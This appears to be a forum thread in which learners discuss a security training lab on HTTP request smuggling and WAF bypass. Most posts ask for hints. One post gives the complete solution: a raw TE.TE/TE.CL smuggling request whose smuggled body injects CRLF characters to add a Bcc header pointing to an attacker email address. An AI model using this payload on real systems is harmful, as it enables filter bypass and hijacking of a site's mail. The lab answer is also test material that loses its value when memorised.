Need some help with the HTTP Attacks - Skills Assessment. After massive headaches, I finally believe I have the proper attack chain – I’m submitting my post request (with malicious content), NOT getting a WAF error, AM getting a seemingly proper return (just as if I were to submit content which was NOT malicious)… but NOT getting the email… Please help. Thx.
EDIT: Solved. SWEAR I had tried the solution before, but clearly did something wrong as a clear-mind managed to get it.
I tried everything I can think of but no result. If you still have the solution can you share it?
Finally worked! Same I feel I tried the solution before but didn’t work
Seems like I’m stuck at the same point. Tried different payloads, think everything’s correct. I can bypass the WAF while sending a malicious payload, but don’t get no email. How did you guys take that exercise?
If anyone can give some pointers here I’d appreciate!
I was able to perform the TE.CL via TE.TE but still get picked by the blacklisted characters. Don’t know if I have to double URL encode it or going through a rabbit hole
Yes tried the same, No email though.
If I am correct, the lab should be fairly easy. Hint is giving too much info. Its a shame still I am not able to solve it.
Edit: Completed 
Could smb explain to me what principle of building the payload should be? I think I’ve bypassed the WAF, but I can’t receive email
URL encoding CRLF character is not needed. Instead see the coverage of WAF where it is not present. Look for weakness in WAF.
Hi all, I can bypass the WAF, but I cannot see anything on /mail. Any hint on how to proceed? Thanks
Hi all, I suppose that I should try to access any internal endpoint protected by the WAF, but I can’t find which one. Any hint? Thanks a lot
Hi @TheRealPatrick, I am stuck at the same point before you solved. Any hint to proceed? Thanks a lot
*Just solved. Thanks anyway.
Hi @ju7LSOw, do you still remember how to solve this?
I can smuggle the http post request through TL.CE but still cannot get any mail.
I suspect the CRLF characters have been tampered by the WAF but got no idea how I can bypass it.
Could you please give some hints? thanks
Hi,
POST /doesnotexist HTTP/1.1
Host: 94.237.53.117:43804
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://94.237.53.117:43804
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.53.117:43804/contact
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Content-Length: 4
Transfer-Encoding: testchunked
d5
POST /contact HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
name=hacker%0d%0aBcc:%[email protected]%0d%0aDummy:%20abc&email=attacker%40evil.htb&message=ciao
0
and
GET /doesnotexist HTTP/1.1
Host: 94.237.53.117:43804
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.122 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://94.237.53.117:43804/contact
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
combined together…
Thank you very much! I guess I didn’t try hard enough…
Finally completed this assessment.
I tried the option from ‘ju7LSOw’ but did not work, I was able to do TE.TE but not TE.CL over TE.TE. Can someone help me to complete this?
For TE.CL to work, you need a modified the content-length. Make sure you performed the following step in Burp (Refer to the TE.CL section for more details):
Also, make sure the GET request has 2 blanks line at the end (i.e. 2 blanks line after 0).
Did that already and I have send you a PM.
Also I cannot save post with embedded media like screenshots.